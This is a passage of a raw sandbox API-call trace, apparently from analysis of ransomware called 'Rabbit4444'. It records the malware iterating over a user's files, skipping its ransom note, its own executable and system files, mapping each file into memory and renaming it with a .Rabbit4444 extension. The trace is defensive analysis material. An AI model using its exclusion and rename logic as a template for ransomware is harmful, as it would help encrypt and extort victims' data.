HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0071.906] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0071.906] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0071.906] CloseHandle (hObject=0x27c) returned 1 [0071.906] CloseHandle (hObject=0x260) returned 1 [0071.906] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216.Rabbit4444") returned 187 [0071.906] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216.rabbit4444"), dwFlags=0x1) returned 1 [0071.907] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbae50fe7, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xbae50fe7, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xbb0b32d3, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x418b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8", cAlternateFileName="334210~1")) returned 1 [0071.907] lstrcmpiW (lpString1="3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.907] lstrcmpiW (lpString1="3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.908] lstrcmpiW (lpString1="3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8", lpString2="Rabbit4444.exe") returned -1 [0071.908] lstrcmpiW (lpString1="3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8", lpString2=".") returned 1 [0071.908] lstrcmpiW (lpString1="3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8", lpString2="..") returned 1 [0071.908] lstrcmpiW (lpString1="3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8", lpString2="windows") returned -1 [0071.908] lstrcmpiW (lpString1="3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8", lpString2="bootmgr") returned -1 [0071.908] lstrcmpiW (lpString1="3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8", lpString2="pagefile.sys") returned -1 [0071.908] lstrcmpiW (lpString1="3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8", lpString2="boot") returned -1 [0071.908] lstrcmpiW (lpString1="3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8", lpString2="ids.txt") returned -1 [0071.908] lstrcmpiW (lpString1="3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8", lpString2="NTUSER.DAT") returned -1 [0071.908] lstrcpyW (in: lpString1=0x130ec18, lpString2="3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8" | out: lpString1="3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8") returned="3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8" [0071.908] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8", dwFileAttributes=0x0) returned 1 [0071.909] lstrlenW (lpString="3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8") returned 64 [0071.909] lstrlenW (lpString="Rabbit4444") returned 10 [0071.909] lstrcmpiW (lpString1="cb295271f8", lpString2="Rabbit4444") returned -1 [0071.909] lstrlenW (lpString=".dll") returned 4 [0071.909] lstrcmpiW (lpString1="71f8", lpString2=".dll") returned 1 [0071.909] lstrlenW (lpString=".lnk") returned 4 [0071.909] lstrcmpiW (lpString1="71f8", lpString2=".lnk") returned 1 [0071.909] lstrlenW (lpString=".ini") returned 4 [0071.909] lstrcmpiW (lpString1="71f8", lpString2=".ini") returned 1 [0071.909] lstrlenW (lpString=".sys") returned 4 [0071.909] lstrcmpiW (lpString1="71f8", lpString2=".sys") returned 1 [0071.909] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.909] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.909] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16322014047) returned 1 [0071.909] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=16779) returned 1 [0071.910] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0071.910] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0071.910] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4490, lpName=0x0) returned 0x27c [0071.910] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4490) returned 0x80000 [0071.914] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1109d8 [0071.914] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0071.914] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1109d8 | out: hHeap=0xe0000) returned 1 [0071.914] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0071.914] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.914] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0071.914] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.914] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0071.914] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16322482993) returned 1 [0071.914] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0071.914] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0071.914] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0071.914] CloseHandle (hObject=0x27c) returned 1 [0071.914] CloseHandle (hObject=0x260) returned 1 [0071.915] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8.Rabbit4444") returned 187 [0071.915] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\3342109535f710219f1781d2bc144e381a38719da81d2754d39683cb295271f8.rabbit4444"), dwFlags=0x1) returned 1 [0071.915] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde79f3ab, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xde79f3ab, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0xdf19b25c, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x3f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd", cAlternateFileName="33B80B~1")) returned 1 [0071.915] lstrcmpiW (lpString1="33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.915] lstrcmpiW (lpString1="33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.915] lstrcmpiW (lpString1="33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd", lpString2="Rabbit4444.exe") returned -1 [0071.915] lstrcmpiW (lpString1="33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd", lpString2=".") returned 1 [0071.916] lstrcmpiW (lpString1="33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd", lpString2="..") returned 1 [0071.916] lstrcmpiW (lpString1="33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd", lpString2="windows") returned -1 [0071.916] lstrcmpiW (lpString1="33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd", lpString2="bootmgr") returned -1 [0071.916] lstrcmpiW (lpString1="33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd", lpString2="pagefile.sys") returned -1 [0071.916] lstrcmpiW (lpString1="33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd", lpString2="boot") returned -1 [0071.916] lstrcmpiW (lpString1="33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd", lpString2="ids.txt") returned -1 [0071.916] lstrcmpiW (lpString1="33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd", lpString2="NTUSER.DAT") returned -1 [0071.916] lstrcpyW (in: lpString1=0x130ec18, lpString2="33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd" | out: lpString1="33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd") returned="33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd" [0071.916] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd", dwFileAttributes=0x0) returned 1 [0071.916] lstrlenW (lpString="33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd") returned 64 [0071.916] lstrlenW (lpString="Rabbit4444") returned 10 [0071.916] lstrcmpiW (lpString1="86b3707cdd", lpString2="Rabbit4444") returned -1 [0071.916] lstrlenW (lpString=".dll") returned 4 [0071.917] lstrcmpiW (lpString1="7cdd", lpString2=".dll") returned 1 [0071.917] lstrlenW (lpString=".lnk") returned 4 [0071.917] lstrcmpiW (lpString1="7cdd", lpString2=".lnk") returned 1 [0071.917] lstrlenW (lpString=".ini") returned 4 [0071.917] lstrcmpiW (lpString1="7cdd", lpString2=".ini") returned 1 [0071.917] lstrlenW (lpString=".sys") returned 4 [0071.917] lstrcmpiW (lpString1="7cdd", lpString2=".sys") returned 1 [0071.917] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.917] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.917] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16322793483) returned 1 [0071.917] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1011) returned 1 [0071.917] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0071.917] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0071.917] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x27c [0071.918] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x80000 [0071.920] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110198 [0071.920] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0071.920] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110198 | out: hHeap=0xe0000) returned 1 [0071.920] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0071.920] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.920] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0071.920] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.921] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0071.921] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16323133000) returned 1 [0071.921] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0071.921] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0071.921] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0071.921] CloseHandle (hObject=0x27c) returned 1 [0071.921] CloseHandle (hObject=0x260) returned 1 [0071.921] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd.Rabbit4444") returned 187 [0071.921] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\33b80b77ad0b63074a6e2d6d52c5022ef09645fe923adea0b00d0886b3707cdd.rabbit4444"), dwFlags=0x1) returned 1 [0071.922] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a073931, ftCreationTime.dwHighDateTime=0x1d327d1, ftLastAccessTime.dwLowDateTime=0x3a073931, ftLastAccessTime.dwHighDateTime=0x1d327d1, ftLastWriteTime.dwLowDateTime=0x3a6dbeef, ftLastWriteTime.dwHighDateTime=0x1d327d1, nFileSizeHigh=0x0, nFileSizeLow=0x8f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745", cAlternateFileName="35F89B~1")) returned 1 [0071.922] lstrcmpiW (lpString1="35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.922] lstrcmpiW (lpString1="35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.922] lstrcmpiW (lpString1="35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745", lpString2="Rabbit4444.exe") returned -1 [0071.922] lstrcmpiW (lpString1="35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745", lpString2=".") returned 1 [0071.922] lstrcmpiW (lpString1="35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745", lpString2="..") returned 1 [0071.922] lstrcmpiW (lpString1="35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745", lpString2="windows") returned -1 [0071.922] lstrcmpiW (lpString1="35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745", lpString2="bootmgr") returned -1 [0071.922] lstrcmpiW (lpString1="35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745", lpString2="pagefile.sys") returned -1 [0071.922] lstrcmpiW (lpString1="35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745", lpString2="boot") returned -1 [0071.922] lstrcmpiW (lpString1="35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745", lpString2="ids.txt") returned -1 [0071.922] lstrcmpiW (lpString1="35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745", lpString2="NTUSER.DAT") returned -1 [0071.922] lstrcpyW (in: lpString1=0x130ec18, lpString2="35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745" | out: lpString1="35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745") returned="35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745" [0071.922] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745", dwFileAttributes=0x0) returned 1 [0071.923] lstrlenW (lpString="35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745") returned 64 [0071.923] lstrlenW (lpString="Rabbit4444") returned 10 [0071.923] lstrcmpiW (lpString1="c60d4e4745", lpString2="Rabbit4444") returned -1 [0071.923] lstrlenW (lpString=".dll") returned 4 [0071.923] lstrcmpiW (lpString1="4745", lpString2=".dll") returned 1 [0071.923] lstrlenW (lpString=".lnk") returned 4 [0071.923] lstrcmpiW (lpString1="4745", lpString2=".lnk") returned 1 [0071.923] lstrlenW (lpString=".ini") returned 4 [0071.923] lstrcmpiW (lpString1="4745", lpString2=".ini") returned 1 [0071.923] lstrlenW (lpString=".sys") returned 4 [0071.923] lstrcmpiW (lpString1="4745", lpString2=".sys") returned 1 [0071.923] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.924] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.924] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16323437891) returned 1 [0071.924] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2291) returned 1 [0071.924] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0071.924] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0071.924] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc00, lpName=0x0) returned 0x27c [0071.925] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc00) returned 0x80000 [0071.926] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1104b0 [0071.926] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0071.926] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1104b0 | out: hHeap=0xe0000) returned 1 [0071.926] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0071.926] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.926] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0071.926] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.926] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0071.926] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16323723437) returned 1 [0071.927] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0071.927] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0071.927] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0071.927] CloseHandle (hObject=0x27c) returned 1 [0071.927] CloseHandle (hObject=0x260) returned 1 [0071.927] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745.Rabbit4444") returned 187 [0071.927] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\35f89b4b9e467bc7de0cfaff3019ebc9644123f2acf37c4dfb22e8c60d4e4745.rabbit4444"), dwFlags=0x1) returned 1 [0071.928] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f22de2, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x84f22de2, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x85007c03, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x424c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45", cAlternateFileName="3FD722~1")) returned 1 [0071.928] lstrcmpiW (lpString1="3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.928] lstrcmpiW (lpString1="3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.928] lstrcmpiW (lpString1="3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45", lpString2="Rabbit4444.exe") returned -1 [0071.928] lstrcmpiW (lpString1="3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45", lpString2=".") returned 1 [0071.928] lstrcmpiW (lpString1="3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45", lpString2="..") returned 1 [0071.928] lstrcmpiW (lpString1="3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45", lpString2="windows") returned -1 [0071.928] lstrcmpiW (lpString1="3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45", lpString2="bootmgr") returned -1 [0071.928] lstrcmpiW (lpString1="3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45", lpString2="pagefile.sys") returned -1 [0071.928] lstrcmpiW (lpString1="3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45", lpString2="boot") returned -1 [0071.928] lstrcmpiW (lpString1="3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45", lpString2="ids.txt") returned -1 [0071.928] lstrcmpiW (lpString1="3fd7221262d4b2523ae9a6f8daeec21a06a8be356d1e0bf940c7012dae68bb45", lpString2="NTUSER.DAT") 